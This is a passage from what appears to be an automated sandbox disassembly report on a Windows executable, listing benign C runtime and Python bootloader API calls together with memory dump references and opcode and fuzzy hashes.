                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C41AF3291C20987EBA6BA15A55127D77E0EB56B80F140235DA9EC3ED1CF3CE503C756
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                          • Instruction ID: 9bbe4a92c9e237224ac684e9b89fd8a225d22c8dee06371ecb6dc72bc8200962
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3018020E0DA8A41FFE6BB61A94127952D0AF45794F080334F95DC3EC6DE2CE4438A02
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F3C90C: HeapAlloc.KERNEL32(?,?,?,00007FF641F2FFB0,?,?,?,00007FF641F3161A,?,?,?,?,?,00007FF641F32E09), ref: 00007FF641F3C94A
                                                                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(?,?,00000000,00007FF641F4274B,?,?,?,00007FF641F39267,?,?,?,00007FF641F3915D,?,?,?,00007FF641F3953E), ref: 00007FF641F46FF1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocAllocate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2177240990-0
                                                                                                                                                                                                                          • Opcode ID: e382dc26276f22423dcda25660a1935eb2fafde86fe36b33accd7187197a4d18
                                                                                                                                                                                                                          • Instruction ID: 4ac917746c5f9b11d4dab3ae454d92892ee579b5b8e0c364327f2a1f85d0e059
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e382dc26276f22423dcda25660a1935eb2fafde86fe36b33accd7187197a4d18
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46016D10E0C64740FFD6BBA2A64027912D06FA8BF0F984231ED6EC7AC2FD2CE4474A01
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                          • Instruction ID: 5ebd6fe65a597229aca3421bce46adaca0717a9703f4cc35b9f6e8000aa39ab1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9E0EC91E0C68F42FBDA7AE8458227D11D09FA4340F945130D90987AC3DD1C7847A623
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,00000000,00007FF641F3A63A,?,?,?,00007FF641F343FD,?,?,?,?,00007FF641F3979A), ref: 00007FF641F3DEFD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                          • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                          • Instruction ID: a8e1bb25efca1823eaf6767ee4eb9e2bfa4195930dcad284c58f077ec6ec2e74
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55F06D50B0D24B80FFD6B7B299513B552D06FA8B80F884130D90EC7BD2DE2CE4878222
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF641F2FFB0,?,?,?,00007FF641F3161A,?,?,?,?,?,00007FF641F32E09), ref: 00007FF641F3C94A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                          • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                          • Instruction ID: a63ab22bec85efa9cdef0c46e86ea8ad5b15aa146ad1542fa0d7e3035dd720b8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF05810B1E24F84FFD677B2591137916C05F98BA0F0A4231EC2FC7AC2EE2CA4638112
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                                                                          • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                          • Instruction ID: ae6e4520795b2bff434007bb3f17861d4e9dd203a2ccd2dd8c6b33b9215edae1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B314D76618B8186EBA1AF60E8403EE73A0FB94744F44403ADA4D87B99EF3CD649C714
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$ErrorFormatLast
                                                                                                                                                                                                                          • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                                                          • API String ID: 3971115935-1149178304
                                                                                                                                                                                                                          • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                                          • Instruction ID: 269523b70a06292eca85c63deac665ae463f356a5746a62b8cfae8629987489e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE215E7261CA8582E771BB50F8506EA73A4FB88784F400136EBCD93A99DF7CD1478B44
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F44F55
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F448A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F448BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: RtlFreeHeap.NTDLL(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C6E
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: GetLastError.KERNEL32(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C78
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF641F39BEF,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F39C19
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF641F39BEF,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F39C3E
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F44F44
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F44908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F4491C
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451BA
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451CB
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451DC
                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF641F4541C), ref: 00007FF641F45203
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4070488512-0
                                                                                                                                                                                                                          • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                          • Instruction ID: 570ae5e0368421c130c17b1d4fac710b277ddf00b0f25bcdca49e0b69b77a866
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BD1AF26A0C64286EBA2FF26D6411B967E1FFA4794F444035EA0DC7AE6DE3CE443C740
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                                                                          • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                          • Instruction ID: 56e331d574f9b7292cf808136d846f354e5c9cdf24d60632d503383391d60e8f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D315E36618B8586DBA1EF25E8403AE73A4FB88754F540135EA9D83B99DF3CC146CB00
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2227656907-0
                                                                                                                                                                                                                          • Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                                          • Instruction ID: c58c5706480dd2b1b8221871b8b8fa46d39e80b13609c015100e19fb8cdcbe6c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FB19622B1C69681EBA2BB2196106F963E0FB64BE4F445131EE5D87BD6DE3CE447C700
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451BA
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F44908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F4491C
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451CB
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F448A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F448BC
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451DC
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F448D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F448EC
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: RtlFreeHeap.NTDLL(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C6E
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: GetLastError.KERNEL32(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C78
                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF641F4541C), ref: 00007FF641F45203
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3458911817-0
                                                                                                                                                                                                                          • Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                                          • Instruction ID: 8c87b41562eb635765a79be36bba81775fb47de72bd49f09d5dc3db6a7a024d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97517F32A0C64686E7A1FF21E9811A963E1BB68784F405136EA4DD7AE6DF3CF443C740
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F250C0
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F25101
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F25126
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F2514B
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F25173
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F2519B
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F251C3
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F251EB
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF641F25C57,?,00007FF641F2308E), ref: 00007FF641F25213
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                                          • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                          • API String ID: 190572456-2007157414
                                                                                                                                                                                                                          • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                          • Instruction ID: 22952cf2cef003488a699aff75332d3deffc794e9a9bd0317f4135eaaf6fa0f9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77127D64A0EB8791FBD7FB48AE101F422E4AF68751B942535C80E932E4FF7DB54B8240
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
